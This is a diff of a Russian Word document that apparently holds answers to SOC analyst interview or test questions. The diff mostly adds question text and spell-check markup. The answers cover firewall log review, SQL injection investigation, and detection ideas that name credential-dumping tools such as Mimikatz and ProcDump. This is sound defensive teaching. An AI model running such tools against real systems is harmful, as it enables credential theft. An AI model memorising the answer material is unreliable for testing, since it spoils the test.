--- a/1/answer.docx
+++ b/1/answer.docx
@@ -11,19 +11,79 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Для эффективного использования журнала безопасности от межсетевого экрана (Firewall) между DMZ (Demilitarized Zone) и Интернетом для обнаружения угроз, необходимо следовать нескольким ключевым шагам:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Анализ логов на наличие аномалий</w:t>
+        <w:t>У вас есть журнал безопасности от брандмауэра между DMZ и Интернетом. Как вы будете использовать этот журнал для обнаружения угроз?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Для эффективного использования журнала безопасности от межсетевого экрана (Firewall) между DMZ (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Demilitarized</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Zone) и Интернетом для обнаружения угроз, необходимо следовать нескольким ключевым шагам:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Анализ логов на наличие аномалий: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Необычные паттерны трафика</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">(аномалии в объеме трафика, например, резкие всплески или падения) </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">и </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Необычные IP-адреса</w:t>
+      </w:r>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:r>
+        <w:t>которые не должны взаимодействовать с вашей сетью, и изучите их активность</w:t>
+      </w:r>
+      <w:r>
+        <w:t>).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Мониторинг событий безопасности</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -36,64 +96,12 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Необычные паттерны трафика</w:t>
+        <w:t>Ошибки и предупреждения</w:t>
       </w:r>
       <w:r>
         <w:t>(</w:t>
       </w:r>
       <w:r>
-        <w:t>аномалии в объеме трафика, например, резкие всплески или падения</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">) </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">и </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Необычные IP-адреса</w:t>
-      </w:r>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:t>которые не должны взаимодействовать с вашей сетью, и изучите их активность</w:t>
-      </w:r>
-      <w:r>
-        <w:t>).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Мониторинг событий безопасности</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Ошибки и предупреждения</w:t>
-      </w:r>
-      <w:r>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
         <w:t>ошибк</w:t>
       </w:r>
       <w:r>
@@ -115,16 +123,18 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Проверка на наличие атак</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:r>
-        <w:t>признаки попыток осуществления DDoS-атак, сканирования портов или попыток эксплуатации уязвимостей</w:t>
+        <w:t>Проверка на наличие атак(</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">признаки попыток осуществления </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>DDoS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>-атак, сканирования портов или попыток эксплуатации уязвимостей</w:t>
       </w:r>
       <w:r>
         <w:t>)</w:t>
@@ -401,6 +411,19 @@
         </w:numPr>
       </w:pPr>
       <w:r>
+        <w:t xml:space="preserve">Вы аналитик SOC и получили предупреждение от системы IDS о SQL-инъекции на веб-сервере. Что вы будете делать? Как вы будете расследовать (технические аспекты)? </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
         <w:t>Как аналитик SOC, при получении оповещения о SQL-инъекции на веб-сервере, я бы предпринял следующие шаги для расследования инцидента:</w:t>
       </w:r>
     </w:p>
@@ -566,6 +589,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -575,7 +599,15 @@
         <w:t>Тестирование уязвимости</w:t>
       </w:r>
       <w:r>
-        <w:t>: Использовать инструменты для тестирования на уязвимости (например, SQLMap) в контролируемой среде, чтобы воспроизвести инъекцию и понять масштаб проблемы.</w:t>
+        <w:t xml:space="preserve">: Использовать инструменты для тестирования на уязвимости (например, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SQLMap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>) в контролируемой среде, чтобы воспроизвести инъекцию и понять масштаб проблемы.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -674,7 +706,23 @@
         <w:t>Исправление уязвимостей</w:t>
       </w:r>
       <w:r>
-        <w:t>: Внедрить параметры для всех SQL-запросов, использовать ORM (Object-Relational Mapping), если это возможно.</w:t>
+        <w:t>: Внедрить параметры для всех SQL-запросов, использовать ORM (Object-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Relational</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Mapping</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>), если это возможно.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -806,6 +854,19 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Наиболее частые сценарии компрометации Windows связаны с использованием инструментов дампа хэша паролей. Предложите сценарии обнаружения (чем больше, тем лучше) использования инструментов дампа хэша. Как можно обнаружить дальнейшее незаконное использование украденных учетных данных?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:b/>
           <w:bCs/>
@@ -928,7 +989,23 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Использование IDS/IPS для обнаружения известных сигнатур инструментов дампа хэша, таких как Mimikatz.</w:t>
+        <w:t xml:space="preserve">Использование IDS/IPS для обнаружения известных сигнатур инструментов дампа хэша, таких как </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Mimikatz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1018,7 +1095,39 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>Поиск файлов, связанных с инструментами дампа хэша, в системе (например, Mimikatz, ProcDump).</w:t>
+        <w:t xml:space="preserve">Поиск файлов, связанных с инструментами дампа хэша, в системе (например, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Mimikatz</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>ProcDump</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1191,6 +1300,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Регулярный анализ поведения пользователей для выявления подозрительных действий, таких как доступ к ресурсам, к которым у них нет стандартного доступа.</w:t>
       </w:r>
     </w:p>
@@ -1238,7 +1348,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>Уведомления о странных геолокациях входа</w:t>
+        <w:t xml:space="preserve">Уведомления о странных </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>геолокациях</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> входа</w:t>
       </w:r>
       <w:r>
         <w:t>:</w:t>
@@ -1374,7 +1500,6 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Эти методы помогут не только обнаруживать использование инструментов дампа хэша, но и минимизировать риски, связанные с незаконным использованием украденных учетных данных.</w:t>
       </w:r>
     </w:p>
@@ -1392,115 +1517,137 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Для обнаружения возможных угроз в компании с двумя офисами (Москва и Пермь) и наличием логов с VPN-шлюза, межсетевого экрана (FW) и системы контроля доступа, можно рассмотреть несколько сценариев. Эти сценарии базируются на современных методах анализа и мониторинга безопасности.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Сценарии обнаружения угроз:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
+        <w:t xml:space="preserve">Вы работаете в компании, у которой два офиса (Москва и Пермь), и у вас есть журналы от VPN-шлюза, FW, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Анализ поведения сети (NTA)</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">   </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
+        <w:t>физической системы контроля доступа. Предложите сценарии для обнаружения возможных угроз.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Для обнаружения возможных угроз в компании с двумя офисами (Москва и Пермь) и наличием логов с VPN-шлюза, межсетевого экрана (FW) и системы контроля доступа, можно рассмотреть несколько сценариев. Эти сценарии базируются на современных методах анализа и мониторинга безопасности.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Сценарии обнаружения угроз:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>Использование систем анализа поведения сети позволяет отслеживать аномалии в сетевом трафике и действиях пользователей. Например:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Анализ поведения сети (NTA)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>Использование систем анализа поведения сети позволяет отслеживать аномалии в сетевом трафике и действиях пользователей. Например:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Мониторинг трафика:</w:t>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Резкое увеличение трафика от определенного устройства может указывать на утечку данных или компрометацию устройства</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Мониторинг трафика:</w:t>
+      </w:r>
+      <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t xml:space="preserve"> Резкое увеличение трафика от определенного устройства может указывать на утечку данных или компрометацию устройства</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-      </w:r>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Выявление аномалий</w:t>
+        </w:rPr>
+        <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Выявление аномалий</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
         </w:rPr>
         <w:t>: Системы NTA могут идентифицировать необычные паттерны поведения, такие как доступ к несанкционированным ресурсам или попытки подключения из необычных местоположений</w:t>
       </w:r>
@@ -1508,9 +1655,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -1536,7 +1680,15 @@
         <w:t xml:space="preserve">.   </w:t>
       </w:r>
       <w:r>
-        <w:t>Системы SIEM (Security Information and Event Management) могут собирать и анализировать данные из различных источников:</w:t>
+        <w:t xml:space="preserve">Системы SIEM (Security Information </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>and</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Event Management) могут собирать и анализировать данные из различных источников:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1584,15 +1736,46 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Проактивный поиск угроз (Threat Hunting)</w:t>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Проактивный поиск угроз (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Threat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Hunting</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1651,9 +1834,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -1748,6 +1928,7 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    </w:t>
       </w:r>
       <w:r>
@@ -1802,6 +1983,27 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="1"/>
         </w:numPr>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>Если у вас есть журналы антивируса, какие правила корреляции(сценарии обнаружения)вы можете предложить?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
         <w:t>Для разработки правил корреляции на основе логов антивируса, важно учитывать различные аспекты, связанные с обнаружением угроз и минимизацией ложных срабатываний. Вот несколько рекомендаций и сценариев, которые могут быть полезными:</w:t>
@@ -1839,7 +2041,6 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    Определение метрик обнаружения</w:t>
       </w:r>
       <w:r>
@@ -1896,7 +2097,15 @@
         <w:t xml:space="preserve">    Правило для обнаружения использования дефолтных учетных записей</w:t>
       </w:r>
       <w:r>
-        <w:t>: Срабатывает при входе под учетной записью с известным паролем (например, "admin")</w:t>
+        <w:t>: Срабатывает при входе под учетной записью с известным паролем (например, "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>admin</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>")</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2039,30 +2248,31 @@
       </w:r>
       <w:r>
         <w:br/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">6.1 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Какие немедленные действия вы предпримете, чтобы сдержать распространение?</w:t>
+        <w:t>6.1 Какие немедленные действия вы предпримете, чтобы сдержать распространение?</w:t>
       </w:r>
       <w:r>
         <w:br/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">6.2 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>В какой системе вы можете попытаться получить дополнительную информацию?</w:t>
+        <w:t>6.2 В какой системе вы можете попытаться получить дополнительную информацию?</w:t>
       </w:r>
       <w:r>
         <w:br/>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">6.3 </w:t>
-      </w:r>
-      <w:r>
-        <w:t>На каком этапе атаки «kill chain» находится этот случай?</w:t>
+        <w:t>6.3 На каком этапе атаки «</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>kill</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>chain</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>» находится этот случай?</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2082,23 +2292,18 @@
       <w:pPr>
         <w:pStyle w:val="a3"/>
         <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">6.1   </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b/>
-          <w:bCs/>
           <w:u w:val="single"/>
         </w:rPr>
         <w:t>Немедленные действия:</w:t>
@@ -2233,22 +2438,14 @@
           <w:numId w:val="17"/>
         </w:numPr>
         <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b/>
-          <w:bCs/>
           <w:u w:val="single"/>
         </w:rPr>
         <w:t>Системы для получения дополнительной информации:</w:t>
@@ -2285,7 +2482,6 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>Используйте системы управления событиями и информацией безопасности для анализа логов и выявления подозрительных действий.</w:t>
       </w:r>
     </w:p>
@@ -2356,34 +2552,52 @@
         <w:rPr>
           <w:b/>
           <w:bCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
         <w:t xml:space="preserve">6.3   </w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>Этап атаки «kill chain»:</w:t>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>Этап атаки «</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>kill</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>chain</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:t>»:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2408,7 +2622,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>"Exploitation"</w:t>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Exploitation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>"</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> (эксплуатация) или </w:t>
@@ -2418,7 +2648,23 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
-        <w:t>"Installation"</w:t>
+        <w:t>"</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Installation</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>"</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> (установка).</w:t>
@@ -2444,9 +2690,6 @@
     <w:p>
       <w:pPr>
         <w:pStyle w:val="a3"/>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -2480,13 +2723,7 @@
         <w:rPr>
           <w:u w:val="single"/>
         </w:rPr>
-        <w:t>Ключевые компоненты журнала</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:u w:val="single"/>
-        </w:rPr>
-        <w:t>:</w:t>
+        <w:t>Ключевые компоненты журнала:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2574,7 +2811,39 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>UDP Snd: Это указывает на то, что запись связана с отправляемым пакетом UDP (протокол пользовательских датаграмм).</w:t>
+        <w:t xml:space="preserve">UDP </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>Snd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve">: Это указывает на то, что запись связана с отправляемым пакетом UDP (протокол пользовательских </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>датаграмм</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2670,7 +2939,15 @@
         <w:pStyle w:val="a3"/>
       </w:pPr>
       <w:r>
-        <w:t>Записи журнала делают запросы записей PTR (Pointer) для различных доменных имен. Записи PTR используются для обратного поиска DNS, позволяя сопоставлять IP-адрес с доменным именем.</w:t>
